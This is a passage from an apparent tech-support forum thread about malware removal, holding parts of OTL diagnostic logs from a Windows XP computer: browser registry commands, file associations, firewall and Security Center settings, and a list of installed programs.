HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\MSN Explorer\shell\open\command\\: "C:\Program Files\MSN\MSNCoreFiles\MSN6.EXE" [2004/06/14 10:29:28 | 000,094,208 | ---- | M] (Microsoft Corporation)

< hklm\software\clients\startmenuinternet|command /64 /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: C:\Program Files\Mozilla Firefox\firefox.exe [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\MSN Explorer\shell\open\command\\: "C:\Program Files\MSN\MSNCoreFiles\MSN6.EXE" [2004/06/14 10:29:28 | 000,094,208 | ---- | M] (Microsoft Corporation)

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< End of report >

#11
goodseed

Posted 18 January 2013 - 11:16 PM

Member

Topic Starter
Member
49 posts

OTL Extras logfile created on: 1/18/2013 10:56:15 PM - Run 3
OTL by OldTimer - Version 3.2.31.0 Folder = C:\Documents and Settings\Owner\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 161.04 Mb Available Physical Memory | 32.00% Memory free
1.20 Gb Paging File | 0.67 Gb Available in Paging File | 55.53% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 75.04 Gb Free Space | 52.05% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (All) ==========

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.bat [@ = batfile] -- "%1" %*
.chm [@ = chm.file] -- C:\WINDOWS\hh.exe (Microsoft Corporation)
.cmd [@ = cmdfile] -- "%1" %*
.com [@ = ComFile] -- "%1" %*
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.exe [@ = exefile] -- "%1" %*
.hlp [@ = hlpfile] -- C:\WINDOWS\System32\winhlp32.exe (Microsoft Corporation)
.hta [@ = htafile] -- C:\WINDOWS\System32\mshta.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf [@ = inffile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.ini [@ = inifile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l
.js [@ = JSFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.jse [@ = JSEFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.pif [@ = piffile] -- "%1" %*
.reg [@ = regfile] -- C:\WINDOWS\regedit.exe (Microsoft Corporation)
.scr [@ = scrfile] -- "%1" /S
.txt [@ = txtfile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.vbe [@ = VBEFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.vbs [@ = VBSFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.wsf [@ = WSFFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.wsh [@ = WSHFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SYSTEMROOT%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- winhlp32.exe %1 (Microsoft Corporation)
hlpfile [open] -- %SystemRoot%\System32\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\WINDOWS\system32\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- "C:\Program Files\Microsoft Office\OFFICE11\msohtmed.exe" %1 (Microsoft Corporation)
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1 (Microsoft Corporation)
inffile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
InternetShortcut [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
vbefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
vbefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
vbsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
vbsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
vbsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
wsffile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
wsffile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
wsffile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
wshfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "%programfiles%\internet explorer\iexplore.exe" (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 1
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\Updates from HP\137903\Program\BackWeb-137903.exe" = C:\Program Files\Updates from HP\137903\Program\BackWeb-137903.exe:*:Disabled:BackWeb-137903 -- ()
"C:\Program Files\LeapFTP\LeapFTP.exe" = C:\Program Files\LeapFTP\LeapFTP.exe:*:Enabled:File Transfer Protocol (FTP) Client -- (LeapWare)
"C:\WINDOWS\system32\dpvsetup.exe" = C:\WINDOWS\system32\dpvsetup.exe:*:Enabled:Microsoft DirectPlay Voice Test -- (Microsoft Corporation)
"C:\WINDOWS\system32\mmc.exe" = C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console -- (Microsoft Corporation)
"C:\Program Files\activePDF\PrimoPDF\PrimoPDF.exe" = C:\Program Files\activePDF\PrimoPDF\PrimoPDF.exe:*:Enabled:PrimoPDF -- (activePDF)
"C:\Program Files\DNA\btdna.exe" = C:\Program Files\DNA\btdna.exe:*:Disabled:DNA -- (BitTorrent, Inc.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Disabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqcopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqcopy.exe:*:Disabled:hpqcopy.exe -- ( )
"C:\Program Files\HP\Digital Imaging\Unload\HpqPhUnl.exe" = C:\Program Files\HP\Digital Imaging\Unload\HpqPhUnl.exe:*:Disabled:hpqphunl.exe -- ()
"C:\Program Files\IncrediMail\bin\ImApp.exe" = C:\Program Files\IncrediMail\bin\ImApp.exe:*:Disabled:IncrediMail -- (IncrediMail, Ltd.)

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0289B35E-DC07-4c7a-9710-BBD686EA4B7D}" = Status
"{0609D0AF-1382-42BE-81DB-CF30F8B0F6E2}" = Serif PhotoPlus 6.0
"{07287123-B8AC-41CE-8346-3D777245C35B}" = Bonjour
"{0861E87B-24D7-4E7C-B11B-54F86E5C5199}" = hpg8200
"{14589F05-C658-4594-9429-D437BA688686}" = IntelliMover Data Transfer Demo
"{14B4E017-ACDF-4DB0-9D94-8988F5F0145A}" = hpg4600
"{15B9DC72-73F9-4d99-9E28-848D66DA8D99}" = HP Photo & Imaging 3.5 - HP Devices
"{18669FF9-C8FE-407a-9F70-E674896B1DB4}" = GPBaseService
"{1D643CD7-4DD6-11D7-A4E0-000874180BB3}" = Microsoft Money 2004
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F7CCFA3-D926-4882-B2A5-A0217ED25597}" = PC-Doctor for Windows
"{20CF99FC-2CE7-4AA4-966E-A4B11C0662B4}" = hpg3970
"{22DE1881-9D24-4981-B5CC-EC7E9F2F4D52}" = Rhapsody Player Engine
"{2614F54E-A828-49FA-93BA-45A3F756BFAA}" = 32 Bit HP CIO Components Installer
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 11
"{29B39FB2-5ADF-4F94-BC82-13942871DD0D}" = CameraDrivers
"{29B50D30-EAFC-4cea-9F76-3A0E3729E9B0}" = SkinsHP1
"{2E132061-C78A-48D4-A899-1D13B9D189FA}" = Memories Disc Creator 2.0
"{2FCE4FC5-6930-40E7-A4F1-F862207424EF}" = InterVideo WinDVD Creator 2
"{318AB667-3230-41B5-A617-CB3BF748D371}" = iTunes
"{3248F0A8-6813-11D6-A77B-00B0D0160030}" = Java™ 6 Update 3
"{3248F0A8-6813-11D6-A77B-00B0D0160050}" = Java™ 6 Update 5
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7
"{34BFB099-07B2-4E95-A673-7362D60866A2}" = PSSWCORE
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3CF78481-FB7B-4B51-99A2-D5E0CD0B3AAF}" = HPSystemDiagnostics
"{45B6180B-DCAB-4093-8EE8-6164457517F0}" = Photosmart 140,240,7200,7600,7700,7900 Series
"{46C045BF-2B3F-4BC4-8E4C-00E0CF8BD9DB}" = Adobe AIR
"{48242276-DB89-42e8-9678-BD4280D7B99A}" = Copy
"{5109C064-813E-4e87-B0DE-C8AF7B5BC02B}" = SmartWebPrintingOC
"{54DE0B75-6CD9-44C4-B10A-1F25DA9899D8}" = Quicken 2004
"{5809E7CF-4DCF-11D4-9875-00105ACE7734}" = Logitech MouseWare 9.79
"{5D9B17E4-5C34-45B2-9C95-8B9DB4CF7AF3}" = HP_Network_UserGuide
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{60758250-C8CF-47EB-8CB6-E0C3B84D8207}" = PSShortcutsP
"{66E6CE0C-5A1E-430C-B40A-0C90FF1804A8}" = eSupportQFolder
"{679EC478-3FF9-4987-B2FF-C2C2B27532A2}" = DocProc
"{687FEF8A-8597-40b4-832C-297EA3F35817}" = BufferChm
"{6F5E2F4A-377D-4700-B0E3-8F7F7507EA15}" = CustomerResearchQFolder
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7148F0A8-6813-11D6-A77B-00B0D0142030}" = Java 2 Runtime Environment, SE v1.4.2_03
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{745A92AF-53B4-41A7-91C3-9B026B1D5897}" = InstantShare
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{80533B67-C407-485D-8B5D-63BB8ED9D878}" = Scan
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{8777AC6D-89F9-4793-8266-DE406F343E89}" = QFolder
"{87E2B986-07E8-477a-93DC-AF0B6758B192}" = DocProcQFolder
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}" = Intel® Graphics Media Accelerator Driver
"{8C64E145-54BA-11D6-91B1-00500462BE80}" = Microsoft Money 2004 System Pack
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91120409-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Standard Edition 2003
"{924EB80F-C2BB-4B9F-8412-88BBA937393F}" = MobileMe Control Panel
"{98E8A2EF-4EAE-43B8-A172-74842B764777}" = InterVideo WinDVD Player
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9B03C535-3AEA-4ef2-B326-0A01A2207034}" = CreativeProjects
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C2D4047-0E40-499a-AC7A-C4B9BB12FE03}" = TrayApp
"{A06275F4-324B-4E85-95E6-87B2CD729401}" = Windows Defender
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A5AB9D5E-52E2-440e-A3ED-9512E253C81A}" = SolutionCenter
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AB5D51AE-EBC3-438D-872C-705C7C2084B0}" = DeviceManagementQFolder
"{AC76BA86-7AD7-1033-7B44-A81200000003}" = Adobe Reader 8.1.2
"{AC76BA86-7AD7-1033-7B44-A94000000001}" = Adobe Reader 9.4.1
"{AD17BC8E-4A5D-4E59-8640-10DF36E9EB75}" = hpg5530
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{B8DBED1E-8BC3-4d08-B94A-F9D7D88E9BBF}" = HPSSupply
"{BAD0FA60-09CF-4411-AE6A-C2844C8812FA}" = HP Photosmart Essential 2.5
"{BC339BFD-F550-471a-8D26-4D08126C62F7}" = SkinsHP2
"{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}" = Microsoft SQL Server Compact 3.5 ENU
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C6A7AF96-4EB1-4AAE-8318-1AB393C64F88}" = Microsoft Plus! Digital Media Edition
"{C6C44651-7C66-4b11-92E8-17565D3D22DD}" = HP Image Zone Plus 3.5
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CBE3E0AF-73BB-4c21-8B96-B09E003EDE7F}" = QuickProjects
"{CD10345B-0DD2-4C67-BC2C-F0CA6680AB21}" = Power BibleCD 4.0a
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D142FE39-3386-4d82-9AD3-36D4A92AC3C2}" = DocMgr
"{D2E0F0CC-6BE0-490b-B08B-9267083E34C9}" = MarketResearch
"{D99A8E3A-AE5A-4692-8B19-6F16D454E240}" = Destination Component
"{DB518BA6-CB74-4EB6-9ABD-880B6D6E1F38}" = HpSdpAppCoreApp
"{E08DC77E-D09A-4e36-8067-D6DBBCC5F8DC}" = VideoToolkit01
"{E8BFBD0A-8002-4dc9-869C-E495FA9DCE7A}" = PhotoGallery
"{EB3526D4-4C7C-4F45-8303-340A23E4F950}" = HPIZFix3
"{ED869D8B-6C7E-44C7-9F2F-BD5436849C61}" = hpg2436
"{EF1ADA5A-0B1A-4662-8C55-7475A61D8B65}" = DeviceDiscovery
"{F247869D-3643-4A9F-821B-3534145928E3}" = HPIZ350
"{F419D20A-7719-4639-8E30-C073A040D878}" = HP Deskjet Preloaded Printer Drivers
"{F50A4470-7A45-4A5A-97F8-806990B736C2}" = MP3+G Toolz
"{F958CA02-BB40-4007-894B-258729456EE4}" = QuickTime
"{FE57DE70-95DE-4B64-9266-84DA811053DB}" = HP Update
"{FF102450-55AA-4AE1-ACE4-E271E2470C83}" = hpmdtab
"62067F4C-84A9-45B9-8573-B90468B0A3EF" = Orbital from Hewlett-Packard Desktops (remove only)
"6723E59E-322A-417A-8E03-27A61E18253C" = Overball from Hewlett-Packard Desktops (remove only)
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Agere Systems Soft Modem" = Agere Systems PCI Soft Modem
"avast" = avast! Free Antivirus
"B8610D19-E576-4F91-8A2F-07898D9CA301" = Word Symphony from Hewlett-Packard Desktops (remove only)
"BackWeb-137903 Uninstaller" = Updates from HP
